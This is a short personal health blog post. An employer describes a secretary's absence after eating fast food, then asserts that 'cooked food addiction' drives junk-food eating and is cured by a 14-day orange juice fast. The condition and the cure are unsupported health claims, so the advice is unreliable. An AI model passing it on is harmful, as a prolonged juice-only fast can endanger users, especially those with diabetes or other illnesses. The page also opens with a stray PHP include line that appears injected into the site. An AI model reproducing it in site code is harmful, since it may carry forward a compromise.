@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Employee absent due to eating junk food - in her own words - My Family Health Blog

Employee absent due to eating junk food – in her own words

My secretary was absent yesterday.  She texted me that she had loose bowel movement.  We had a lot of work and I needed some things from her so I called her up hoping she could come in even if she was late.  She was groaning on the telephone.  Still not finished pooping.   She said she couldn’t make it even after lunch.

I asked her what she ate the previous night that made her feel this terrible.

She answered, “Junk food!”

I asked, “What kind of junk food?”

She said, “Jollibee.”

I asked, “What junk food did you eat?”

She said, “Lots and lots of french fries!”

I tell them and I tell them and I tell them.  I teach my employees ways of good living because absenteeism costs my company money.  My interest is in their complete wellness.

Avoiding junk food is such a simple thing.  But most people easily succumb to junk food because they are still suffering from cooked food addiction.  As long as you suffer from cooked food addiction, you are vulnerable.

How to be cured of cooked food addiction?  Do a 14 day Orange Juice fast.